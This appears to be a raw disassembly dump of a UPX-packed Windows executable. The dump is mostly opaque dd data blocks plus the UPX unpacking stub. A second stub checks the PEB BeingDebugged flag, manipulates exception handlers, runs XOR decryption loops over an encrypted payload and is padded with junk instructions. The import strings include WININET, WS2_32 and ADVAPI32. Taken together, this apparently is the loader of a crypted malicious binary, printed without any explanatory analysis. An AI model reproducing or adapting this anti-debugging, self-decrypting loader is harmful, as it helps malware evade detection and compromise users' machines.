dd 56FFFFFFh, 49E7F61Ch, 0BEE0EA9Bh, 7EDB21AFh, 5E1A9544h
dd 85A03261h, 949F6A1Fh, 0FFFF68B1h, 843994FFh, 358F26A6h
dd 0A55C1DCEh, 7AB20BC9h, 8F1D2252h, 20D25603h, 62372728h
dd 0B6FDAD6h, 53773B31h, 36204549h, 0E8920915h, 0E41A1A36h
dd 6F297435h, 77CF76D0h, 0C0017A83h, 0EA0B004h, 9E798C00h
dd 6C7C79E7h, 0E7445460h, 34E7BE79h, 101C0428h, 3CF3CF08h
dd 0E84DF8CDh, 0B0BCC4D4h, 3CC986C2h, 6883D7A4h, 0F6D37AD6h
dd 6962A48Dh, 6308007Ah, 6C2E733Eh, 9AD68D76h, 766343DFh
dd 77722E76h, 2ADB0700h, 6C8E6294h, 5F660FACh, 5B6370AFh
dd 68306F31h, 632E7404h, 3ADD8DE7h, 6506ED0Ah, 22686345h
dd 0BDACF600h, 9B6C1EB0h, 0DA61736Eh, 5775660Fh, 0BDADF0BCh
dd 6EEBFF09h, 0A82E696Bh, 6E740067h, 446DACEDh, 611F206Ah
dd 616B3A3Ch, 0C650D1A1h, 2DAC6D0Ch, 0B6D62FCDh, 65B9ED6h
dd 2A620E71h, 86B6CE41h, 234DF29h, 0B6630B7Ah, 5D0BD8Dh
dd 6E2E70F4h, 735B6917h, 1D602D27h, 78AB7003h, 8E617A0Fh
dd 6C75D28Dh, 0B47029C4h, 0B42BDE5Bh, 0C2A86BC7h, 0F4F9195h
dd 1336CB13h, 0F0633269h, 6F4EFD2Bh, 2E626A2Ch, 617A9BA9h
dd 1F0BA81Eh, 61DB3090h, 66176362h, 0FF6C2ADFh, 6A696867h
dd 6E6D6C6Bh, 0BB6B71B9h, 79787776h, 0A37FF97Fh, 4241F57Ah
dd 46454443h, 4A494847h, 504F4E4Bh, 9535251h, 54FE51E9h
dd 58575655h, 0EF4F5A59h, 607737E1h, 0E9652F0Bh, 7068702Eh
dd 0DAD7023Fh, 0F3D6DF6h, 6E63733Fh, 0DB0C6406h, 4B6DC806h
dd 3D3B76DBh, 74133F88h, 22E8C11Bh, 73C480B2h, 0C2A50285h
dd 0AF3E4701h, 36391E35h, 9449B76Dh, 570F416Fh, 3546657Dh
dd 0A0418565h, 6846BF0Ah, 1621430Ch, 6535CC81h, 0D2BA14B6h
dd 614E2931h, 316C39C6h, 686B149Ch, 1E41C466h, 861544FCh
dd 63D23535h, 8A1F79FDh, 0CB77BC2Dh, 79708509h, 450B6E38h
dd 6B819834h, 73405162h, 683A05A5h, 76705953h, 0D060FE53h
dd 0ED70AD5Ah, 78E194Dh, 12B5A19Bh, 540F9432h, 0CC160381h
dd 182C3535h, 0D87C4E21h, 746D0B60h, 6C727068h, 9B306E65h
dd 653D6ECh, 6E1A7065h, 0B25CF1A3h, 12477520h, 0C57C6A0Bh
dd 7264332Eh, 3A4CC80Fh, 0D78764DAh, 7319BFA7h, 4B4CDA4Dh
dd 0B5D4E705h, 4D48200Dh, 1C480840h, 0B6213B2Fh, 1D59B3ADh
dd 6BFF5470h, 4DB275FCh, 0EF72D61Ch, 41784F4Dh, 9BD96FFDh
dd 0DE0D3844h, 0E66C5DBCh, 7645396Eh, 8F0A62A8h, 87704D45h
dd 52317895h, 0B0DEB405h, 865CFADh, 48653353h, 84D3420Fh
dd 4CEA2FCDh, 270045CEh, 0C7B5B073h, 272C440Dh, 0CDE16157h
dd 15462DB5h, 4F0F4B53h, 1DC06A62h, 49986C38h, 0EB5497Ah
dd 0FAABADB4h, 630A6492h, 0F67EC61Ah, 0D15A364Dh, 4BDE678Dh
dd 0B0457965h, 10773858h, 5E0F64C3h, 51ED0AC2h, 0DB11400Ah
dd 0C059B166h, 10219330h, 1DEDDA30h, 410C516Bh, 42609E62h
dd 8745A153h, 436EC941h, 22DB3899h, 48777406h, 0FB6E3828h
dd 440A1082h, 0D60E6112h, 619BB63Ah, 0DB796669h, 2B754067h
dd 476F6136h, 6F186C1Bh, 18112C79h, 6F6F6770h, 0D8F5210h
dd 5E3D9FE4h, 41146573h, 69757163h, 1D2B9C72h, 5494D36h
dd 0ED4C3AA0h, 0DE131669h, 1CAB6DE8h, 0D1F0D685h, 72688007h
dd 0C7892F5Fh, 2A6E3C5Ch, 7F1E685Fh, 0FC747319h, 7235CE66h
dd 36060D11h, 0D7AB7970h, 0FC8E3D8h, 985CF073h, 10E27AE5h
dd 0CD634603h, 0CC341730h, 0B965B962h, 0B3198C15h, 2C0A14D8h
dd 80B0AD02h, 5C491Bh, 10B90D70h, 66DB34E1h, 24F44F41h
dd 0CB6187DAh, 11515330h, 0C2D80A9Fh, 418555B6h, 6E0D0E11h
dd 140C4258h, 6E6E1D7Dh, 441C3716h, 2C74532Bh, 36D96567h
dd 73FF5215h, 960D0202h, 1965965h, 17346F39h, 6596590Ch
dd 13040959h, 0A3811610h, 50E14027h, 5F2FB945h, 14412F99h
dd 0F540D087h, 10B01E0h, 0B83B3D82h, 1312BE06h, 0B60B1D88h
dd 25CEC6ACh, 0F5020B31h, 65B99D07h, 1E0C506Fh, 9791034h
dd 60781BCh, 6C2BF08Eh, 8C642037h, 1E017C64h, 2B8F43D8h
dd 23015D2Eh, 6230790h, 4AC42436h, 20BEE004h, 642EC7B7h
dd 0FE4FBE9h, 7E8D282Bh, 1627C2DDh, 2DF804C0h, 15h, 1200B698h
dd 0FF0000h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31005000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31006AF2
; ---------------------------------------------------------------------------
align 8
loc_31006AE8: ; CODE XREF: UPX1:loc_31006AF9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31006AEE: ; CODE XREF: UPX1:31006B86�j
; UPX1:31006B9D�j
add ebx, ebx
jnz short loc_31006AF9
loc_31006AF2: ; CODE XREF: UPX1:31006AE0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006AF9: ; CODE XREF: UPX1:31006AF0�j
jb short loc_31006AE8
mov eax, 1
loc_31006B00: ; CODE XREF: UPX1:31006B0F�j
; UPX1:31006B1A�j
add ebx, ebx
jnz short loc_31006B0B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B0B: ; CODE XREF: UPX1:31006B02�j
adc eax, eax
add ebx, ebx
jnb short loc_31006B00
jnz short loc_31006B1C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B00
loc_31006B1C: ; CODE XREF: UPX1:31006B11�j
xor ecx, ecx
sub eax, 3
jb short loc_31006B30
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31006BA2
mov ebp, eax
loc_31006B30: ; CODE XREF: UPX1:31006B21�j
add ebx, ebx
jnz short loc_31006B3B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B3B: ; CODE XREF: UPX1:31006B32�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31006B48
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B48: ; CODE XREF: UPX1:31006B3F�j
adc ecx, ecx
jnz short loc_31006B6C
inc ecx
loc_31006B4D: ; CODE XREF: UPX1:31006B5C�j
; UPX1:31006B67�j
add ebx, ebx
jnz short loc_31006B58
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B58: ; CODE XREF: UPX1:31006B4F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31006B4D
jnz short loc_31006B69
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B4D
loc_31006B69: ; CODE XREF: UPX1:31006B5E�j
add ecx, 2
loc_31006B6C: ; CODE XREF: UPX1:31006B4A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31006B8C
loc_31006B7D: ; CODE XREF: UPX1:31006B84�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31006B7D
jmp loc_31006AEE
; ---------------------------------------------------------------------------
align 4
loc_31006B8C: ; CODE XREF: UPX1:31006B7B�j
; UPX1:31006B99�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31006B8C
add edi, ecx
jmp loc_31006AEE
; ---------------------------------------------------------------------------
loc_31006BA2: ; CODE XREF: UPX1:31006B2C�j
pop esi
mov edi, esi
mov ecx, 82h
loc_31006BAA: ; CODE XREF: UPX1:31006BB1�j
; UPX1:31006BB6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31006BAF: ; CODE XREF: UPX1:31006BD4�j
cmp al, 1
ja short loc_31006BAA
cmp byte ptr [edi], 1
jnz short loc_31006BAA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31006BAF
lea edi, [esi+4000h]
loc_31006BDC: ; CODE XREF: UPX1:31006BFE�j
mov eax, [edi]
or eax, eax
jz short loc_31006C27
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_31006BF9: ; CODE XREF: UPX1:31006C1F�j
mov al, [edi]
inc edi
or al, al
jz short loc_31006BDC
mov ecx, edi
jns short near ptr loc_31006C0A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31006C0A: ; CODE XREF: UPX1:31006C02�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_31006C21
mov [ebx], eax
add ebx, 4
jmp short loc_31006BF9
; ---------------------------------------------------------------------------
loc_31006C21: ; CODE XREF: UPX1:31006C18�j
call dword ptr [esi+6094h]
loc_31006C27: ; CODE XREF: UPX1:31006BE0�j
popa
jmp loc_31001D88
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31007000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C3528Dh, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3100725F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3100720F�j
jmp short near ptr loc_3100720A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3100725E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3100724D: ; CODE XREF: UPX2:3100725C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3100724D
locret_3100725E: ; CODE XREF: UPX2:31007220�j
retn
; ---------------------------------------------------------------------------
loc_3100725F: ; CODE XREF: UPX2:31007201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], dl
add al, dl
push 0
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 1E003100h
db 2 dup(0), 68h
; =============== S U B R O U T I N E =======================================
sub_3100727F proc near ; CODE XREF: UPX2:310072C5�p
pusha
push ebp
mov ebp, esp
call loc_3100729B
call sub_3100731F
mov ebp, fs:0
lea ebp, [ebp+8]
jmp near ptr loc_310072CA+1
sub_3100727F endp
; ---------------------------------------------------------------------------
loc_3100729B: ; CODE XREF: sub_3100727F+4�p
push dword ptr fs:0
mov fs:0, esp
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push 4
push ebx
push 80000000h
push 800h
push 80000000h
push ebx
push ebx
call sub_3100727F
loc_310072CA: ; CODE XREF: sub_3100727F+17�j
xor [ecx], ebp
sar dh, 0C8h ; CODE XREF: UPX2:310072D3�j
or al, al
jz short loc_310072D7
jnz short near ptr loc_310072CC+1
jmp short loc_3100733E
; ---------------------------------------------------------------------------
loc_310072D7: ; CODE XREF: UPX2:310072D1�j
sub esi, esi
sub ecx, ecx
mov cl, 0BAh
loc_310072DD: ; CODE XREF: UPX2:310072DE�j
inc esi
loop loc_310072DD
call sub_3100731B
add ecx, 47h
mov edx, 243Ch
push ecx
loc_310072F1: ; CODE XREF: UPX2:31007301�j
mov al, [ecx]
sub ax, si
mov [ecx], al
add ecx, 1
sub edx, 1
loc_310072FE: ; CODE XREF: UPX2:31007341�j
cmp edx, 0
jnz short loc_310072F1
pop ecx
mov esp, fs:0
pop dword ptr fs:0
leave
mov [esp+18h], ecx ; CODE XREF: UPX2:31007356�j
popa
jmp ecx
; ---------------------------------------------------------------------------
db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_3100731B proc near ; CODE XREF: UPX2:310072E0�p
pop ecx
jmp ecx
sub_3100731B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
sub_3100731F proc near ; CODE XREF: sub_3100727F+9�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_3100731F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dec edx
mov ds:0BABABABAh, al
inc ebp
mov esi, 0E53AB1DEh
fidivr word ptr [edx-45454546h]
loc_3100733E: ; CODE XREF: UPX2:310072D5�j
cmp al, [ebx+52h]
db 66h
jecxz short loc_310072FE
mov edx, 0BEDE1645h
db 2Eh
out 0B6h, eax ; Interrupt Controller #2, 8259A
adc eax, [ebx+6Ah]
push 0FFFFFFE3h
loc_31007351: ; CODE XREF: UPX2:31007371�j
mov edx, 6E7243BAh
jecxz short near ptr loc_31007311+1
mov edx, 0DEE9723Ah
mov edx, 0C72FA2BAh
mov ebp, 0BADEEA52h
mov edx, 0B9BC1545h
in eax, dx
movsd
retn 5245h
; ---------------------------------------------------------------------------
jmp short loc_31007351
; ---------------------------------------------------------------------------
db 0BAh
dd 15EDB9BAh, 263B4F0Fh, 0BABFBEDEh, 9D3BBABAh, 0B9B9AABAh
dd 0CAC0A73Bh, 3645BAFAh, 6F47BEDEh, 0BAFAEEF6h, 0BABABA73h
dd 3B5EADBAh, 220E0835h, 0C72F2D23h, 47F6FD45h, 3B20D2BEh
dd 2EFF0AF2h, 0BAA53BC2h, 2FBABABBh, 320A459Ch, 2C458DBDh
dd 0D20445DAh, 670BADBDh, 323B7DBDh, 1F01BAB9h, 3BD52F2Eh
dd 2C0ABD32h, 0CC2F1D29h, 0FBC1323Bh, 2F2C1E1Eh, 0C5323BC3h
dd 0BA2D2D1Fh, 919CBF2Eh, 0E37D1713h, 2C45DEC6h, 0ADBD13DEh
dd 8BE71C9h, 0BDD63445h, 41EE45B5h, 0C6A2ADBDh, 0FDBABABAh
dd 1F2D2926h, 1E281B02h, 0DBA1F26h, 3F4390B9h, 0BAFAEFF6h
dd 0BABAC7A2h, 1F2CFDBAh, 0FF1F2E1Bh, 2E281F30h, 0B90DBAFBh
dd 0FA3F4390h, 0A2BAFAEFh, 0BABABAC7h, 62E1F01h, 0FF2E2D1Bh
dd 2C292C2Ch, 90B90DBAh, 0EFFE3F43h, 2AA2BAFAh, 3FBABABAh
dd 0ADB2E7Ah, 0EFFE4FB9h, 7A3FBAFAh, 3F47CA2Fh, 0BAFACB8Ch
dd 0A2B90A44h, 0BABABA28h, 4FB936A5h, 0BAFAEFF6h, 0EEEB3FB1h
dd 0BABABAFAh, 0D82E3ABAh, 0EEEF6F47h, 3645BAFAh, 5F5EBEDEh
dd 0F36C5745h, 6F45BAFAh, 0BAFAF370h, 0F3747745h, 7D17BAFAh
dd 24BA2414h, 24BA24BAh, 0BABB22BAh, 7E45BABEh, 240ABA24h
dd 0B97E45C6h, 190E109Ch, 0EDBABAEDh, 0B994A283h, 4F47B9B9h
dd 0BAFACB5Bh, 0A0B0B0Ch, 0EFFA4FB9h, 7E3DBAFAh, 0AC447DDAh
dd 0BADC1973h, 0FACAEABAh, 0B39C90BCh, 0CB13947Dh, 0D6BC37C8h
dd 0BAC90DB0h, 0A6CC3205h, 0FBACBFFFh, 0F19CC228h, 1E38FBCDh
dd 0A035A5B8h, 35F4AB21h, 0D6759005h, 0CFF2DDF0h, 0A87A3130h
dd 4F73BC80h, 76D5F0B5h, 0ED1E0C90h, 99AB57B2h, 77153AA0h
dd 96B15A75h, 79599730h, 194CB285h, 46016749h, 471C8255h
dd 614ED2C2h, 0AD271238h, 0EE690E2Dh, 7DA4A308h, 0FE78CE73h
dd 0A513B2D8h, 0D134C44Ch, 265C5AE7h, 1B3DF210h, 6EC67A8h
dd 6E6D8808h, 9DFCBC48h, 7E59D21Dh, 9D8C7718h, 653E0BFCh
dd 0C329598Bh, 0DEC41A50h, 0B2C5F12Fh, 2FD4FA26h, 0D64C62DDh
dd 13957F0h, 990CF246h, 0D112D95Dh, 0BA63223Ch, 5E737276h
dd 0AB214F21h, 81147A76h, 0CFF81D5Fh, 0FD8EFADBh, 29B4A97Ch
dd 0E5B4DB00h, 361192F5h, 3EC82DD0h, 42F752B5h, 451FF8FEh
dd 70BCFC93h, 0FA24B271h, 667432D8h, 0A5F41B40h, 0F6515235h
dd 0A5846F10h, 6D46D7F4h, 9E942493h, 0D2FC22A0h, 0FF6474B0h
dd 40FFEE70h, 0FCCAA81h, 0FD9CC3E8h, 1E39DABDh, 46726AB8h
dd 1B9FFA21h, 167C5758h, 7EA4CF98h, 8CC04B58h, 4E8AD9B3h
dd 50E265F1h, 92D90996h, 0E1AC12C5h, 4393FD11h, 563C9738h
dd 0ED681930h, 3E2701DAh, 8EB4DAFAh, 2AE0969Ah, 0EBEFAA14h
dd 0C62C27B0h, 1DA32F25h, 0CFEBE2C8h, 2B74E7F5h, 611DB218h
dd 0D03642CFh, 7BDB82A8h, 9E04BF68h, 9B05178h, 0F9DFB992h
dd 163176C5h, 3F94E9B0h, 9941778Bh, 8BAB5A40h, 765CF780h
dd 6505BA23h, 863BF435h, 0E6598520h, 5D3CA2B5h, 0FB1FCB00h
dd 0E6CC0531h, 5B202747h, 0AF7B02E8h, 0A5457BE3h, 467BA875h
dd 83622260h, 0DB09D1ABh, 0BE2420F2h, 26B2310Fh, 5EBFB36Ah
dd 0F93DC564h, 17836A36h, 20ECECE3h, 0A5E907B8h, 1FBC2215h
dd 0FE244A64h, 6219E64Fh, 0A57F5885h, 0ABC368CBh, 9EC4370Ch
dd 0A1CE5278h, 0D9980165h, 34A84676h, 0A80BEC17h, 3F960A18h
dd 52AB5A80h, 3223C2FEh, 0DEDC2AB6h, 0A07492B8h, 5802CBE0h
dd 8337B27Ah, 7E64DF90h, 2650B580h, 4E8DE828h, 50B07D28h
dd 0C800F590h, 60AC2C38h, 0EEEA8C5Eh, 5665E020h, 0FE4F430h
dd 4D7C016Eh, 4E897E8Dh, 73F59168h, 3D08B9A3h, 3B87613Dh
dd 0EE447A0Dh, 90304B08h, 659B4A70h, 0FB0D17A7h, 0CE342A40h
dd 22A8071Dh, 0BEAFEAD0h, 0E4CC7EDh, 542BA20h, 1631AED5h
dd 3E76F2B0h, 3D18F218h, 0DEC98563h, 84453438h, 0FDE9D6B9h
dd 9A8D4855h, 0AE15DFCDh, 0CED11158h, 7A40ABDh, 2621EED5h
dd 0B8A86AC0h, 0BD97DC08h, 0DE7916FDh, 4DEC57F8h, 1886798Dh
dd 0D14E78C6h, 10E5F45Ch, 264C63F0h, 4A592D00h, 15D1A485h
dd 8C5D3C00h, 2511EED1h, 45867A3Dh, 56F11E95h, 0CC68D570h
dd 0B43C6802h, 7E69598Bh, 0B95C4295h, 0D517DA4Ch, 0C6015EE5h
dd 989424E0h, 26915146h, 0F7644A7Dh, 0A6CCF330h, 9755450Bh
dd 0A570E6DCh, 0CBA09F23h, 343B9278h, 7CE09F9Fh, 0C23C6248h
dd 2E39A91Bh, 630CF265h, 8CA04E80h, 48E070A7h, 0FAB809F2h
dd 60AC2CF0h, 56893946h, 0D37C62F5h, 51B0DE70h, 26503FF0h
dd 0FFEDCD00h, 73157207h, 5E4480E4h, 876D2AC5h, 2E548702h
dd 440C36D8h, 0D1F47AA1h, 5374279Bh, 8E791A80h, 3D677671h
dd 25BCCEDCh, 0C6FE5EF5h, 330A2E0h, 9DCB512Bh, 7E59A61Dh
dd 27448D18h, 0E3542BCh, 0E3D719E8h, 0DEC4FF64h, 2D03F7D1h
dd 0AE0D8753h, 1694AA50h, 7EA4F3B2h, 0E60C2FB5h, 4E749AC1h
dd 0B6DC0228h, 1E446A90h, 0ED5B0829h, 2E2982EDh, 0EA55FDC8h
dd 0B9194AACh, 0EA0B10F6h, 6B43FBBEh, 13C9A39Ah, 8862792Ch
dd 3900F5D5h, 635174h, 682538CBh, 0E2249F7Ch, 7A5A4627h
dd 11F4C89Dh, 0C27D6756h, 421D30EDh, 0C92C9395h, 7A751F0Eh
dd 2AE5E8A5h, 0AE85574Dh, 45360BE8h, 0E0F35A41h, 93502305h
dd 1DFBC80h, 877B6555h, 4B22BD20h, 0C8A19669h, 6A3F370Dh
dd 18F4E6B5h, 4E983B1Dh, 5701F4E7h, 0C6988F5Ch, 624D3706h
dd 0BE27D60h, 82615629h, 2600F9D3h, 199C8E75h, 6F4E2D2Eh
dd 0DC4B598h, 9649AA1Ch, 1E20E6D1h, 0CAB55F4Eh, 6A252808h
dd 0E3BD7E8Dh, 0B9776635h, 2B08CDB9h, 0CB85563Dh, 3B07EAEDh
dd 0DAD59884h, 7A68FBFDh, 23DABBB6h, 7F936F3Ch, 52313918h
dd 0EBD0833Ah, 93521B37h, 0AE9F150h, 0A3986B72h, 4B31E3ECh
dd 0E2A1A988h, 6B483935h, 7D4D7ACh, 0AB903E22h, 531F02E9h
dd 0C3A99E5Ch, 5A551808h, 13F5887Dh, 957C6325h, 1B38DECDh
dd 0C77C826Dh, 8E7502ECh, 24D0A7A3h, 87733C2Dh, 5ECF0CBh
dd 0CB866E3Dh, 6D2515F6h, 0BFCC8F92h, 87776ED8h, 300DE69Ch
dd 0BF8A6356h, 3F01EAD1h, 0E3D58888h, 0AC76090Bh, 0D6E1BEA1h
dd 0A4895A73h, 43380BD2h, 0DEC47B45h, 0B73F2001h, 0FBF4F950h
dd 9D7A424Ah, 4123DFBFh, 0EDAAB288h, 71532F0Fh, 0FFCE0467h
dd 4E884D2Eh, 5907F4F8h, 11B37D6Dh, 6E5110C6h, 0BC33A8Ch
dd 0AA656834h, 2A18CBCDh, 0D3AA8B66h, 4F43FFECh, 2C19568h
dd 7B60530Ah, 2319EBE4h, 0CBB04DA0h, 49BC12E5h, 0DBD89D89h
dd 7B75662Dh, 0C0FEE9Dh, 0E2815E41h, 9E2917F9h, 0E7D9B0A5h
dd 8B6D1010h, 14DEE1B3h, 3E897659h, 521A0BC2h, 0CFD07B6Dh
dd 99471EFCh, 7F2E150h, 9FAE7744h, 74D4DFC4h, 0F0A0A374h
dd 4E581DFDh, 0FFDECBA6h, 0AB973F24h, 5107D6D7h, 0E444986Dh
dd 633A1504h, 2CF9AE81h, 56613E21h, 3023DEF2h, 0C3A09375h
dd 714F0CD0h, 0F6CBB585h, 90433E12h, 2300F3D5h, 0D1AF6C70h
dd 532B15E5h, 0EADE4A88h, 87714417h, 2B23BFACh, 0CD857647h
dd 4AFEEAF2h, 0D4BCB3ADh, 0B5671F09h, 39E1F5A2h, 0A47F733Ch
dd 5D203018h, 0CCCE7F70h, 76411E01h, 0EBFBE92h, 0B89C7055h
dd 4139DDC3h, 0F1A7B677h, 44A4380Dh, 0FDDAE2A4h, 9A933F2Ch
dd 420ADBF2h, 0E3A08B5Dh, 78572F15h, 0FACE3A99h, 0A2655413h
dd 30FDC0CDh, 0BAAD8764h, 7551FFC5h, 281CAB96h, 8459561Ch
dd 2217F5D1h, 0C0A84D3Dh, 421F00E1h, 0F1BE8B93h, 98606531h
dd 0CE17C8A9h, 0E99D5573h
dd 4A320BDCh, 0E92CA285h, 8B632904h, 31DBC1B7h, 0A1645E4Dh
dd 433610EBh, 0ED348E5Fh, 8D443605h, 17E2BE9Fh, 0A399734Ah
dd 5139EC20h, 0F3AB6272h, 71A42E12h, 3F3D5ABh, 0B4AD9A2Ch
dd 4C0AE7D4h, 0C2837E6Dh, 3E51250Bh, 12F8A881h, 0AC45A225h
dd 2412EFBCh, 0C38F8675h, 744F1DECh, 2BBA77Ah, 8A534E2Dh
dd 0C611E6D9h, 0CBA86869h, 622100F6h, 0E4C99AB3h, 7C55B219h
dd 3402BFACh, 0C6A77645h, 501918EDh, 0BF2C938Ch, 80792E02h
dd 8F0C79Ah, 7C886B4Dh, 0A6310EF1h, 0CFE69E41h, 488BFB38h
dd 22C0EE72h, 0A59144B8h, 412FE6DFh, 0DFA19D65h, 5D49FCF0h
dd 0FCF1C28Bh, 8B7D3F07h, 68DCC3D0h, 0CB95916Dh, 54452415h
dd 0BE9A681h, 563D4A05h, 1107EFDEh, 0C77E8675h, 4B590FE4h
dd 791C8390h, 269BAFB9h, 0C6ECEAE9h, 0F2D1E2A0h, 9622E524h
dd 0CEF54F96h, 0E1914C07h, 7A6BEA04h, 0F6825678h, 0D5131CC1h
dd 0C60122E5h, 72D83DE0h, 0E370B72Bh, 0FAE38A70h, 1BFFB510h
dd 0CE29CBFDh, 0A6D7F5E8h, 0E4DA2AB6h, 73D007BBh, 0EE59FAE0h
dd 16CCE67Bh, 6674CAF0h, 0E60CCB0Ah, 4E8AEE47h, 76023E9Fh
dd 2E446A78h, 58AA2CF8h, 0B4EC3A86h, 0B07CA221h, 0E33BB30h
dd 1330E7DBh, 475FDAC0h, 0C318D70Bh, 1509AA10h, 3B73BEC4h
dd 2E948F28h, 349DE67h, 0FEE43A70h, 0B93FE3D7h, 4B6B6C33h
dd 369CB7F4h, 81587995h, 0D2545278h, 0F9DFB993h, 16313AC5h
dd 1FDF17B0h, 0BECCF237h, 653F193Fh, 43F4475Fh, 65812A90h
dd 466CB5D0h, 0C59F2C48h, 3AC1DDEBh, 0FBA40ABDh, 5B13C618h
dd 4E53CF43h, 0BDF95A28h, 5DBB09E3h, 0DE61951Bh, 0EE143A60h
dd 42E9230Dh, 0F1E4CA26h, 7CD1EFD1h, 3FB41A15h, 26ED93B4h
dd 0EBEF5B01h, 0C62C27CCh, 45787E1Bh, 56F1CE95h, 0FA628770h
dd 66F467D8h, 3F41A40h, 209BDF29h, 0D51AEAD0h, 1036C7EDh
dd 0A044BA20h, 0D62002FDh, 0FAE38A96h, 238F180Ch, 0EF4744Ch
dd 0F3DFE29Dh, 0DEC4247Ah, 46529294h, 0AF2A3DF5h, 2937635Eh
dd 0F5A81D83h, 124CB745h, 4E6B42B0h, 0E6630228h, 12946D47h
dd 903A676Dh, 488B3AA0h, 567CA3BCh, 0BFDC94B7h, 4E4B7298h
dd 1954A527h, 177E351Fh, 47AF1Ch, 49AA6D45h, 0B98789DBh
dd 0CA433554h, 0BEBA7EA0h, 0D726409h, 0DB84AF33h, 72DB8268h
dd 4A597514h, 212C9245h, 6DEA3DABh, 0D6E22903h, 8DDD8AD8h
dd 0B032B517h, 0E2D0258h, 0B829C2E8h, 0A76E94B1h, 9F2BE245h
dd 6EE6C0ADh, 0EC06788h, 0B1D0CF8h, 0E6CC0892h, 7B33BCABh
dd 0B6DC0240h, 43C5A790h, 866CBDF1h, 0BCCAD7E7h, 9AFBA208h
dd 0C5E4120Ch, 264CBB14h, 96D05B00h, 221C4266h, 5E85AE38h
dd 56616138h, 0B9543A8Dh, 0B2405F6Ch, 0FE244B6Ch, 0FE8C4C08h
dd 0CEF41A3Ch, 36B05472h, 225989BBh, 392C9245h, 6A0747A9h
dd 7FC2249h, 8F627461h, 0A634F3EEh, 0C0F45A80h, 4378578Bh
dd 5B962A90h, 96A366C2h, 0AFD8E2ECh, 5D8F6288h, 8084EE3Ch
dd 73673258h, 4EB490E8h, 429C87F1h, 0EE580D7Ah, 8652866Fh
dd 1CC78BAEh, 63C837ABh, 3B2D0AF0h, 0F4FC87D8h, 9B806F73h
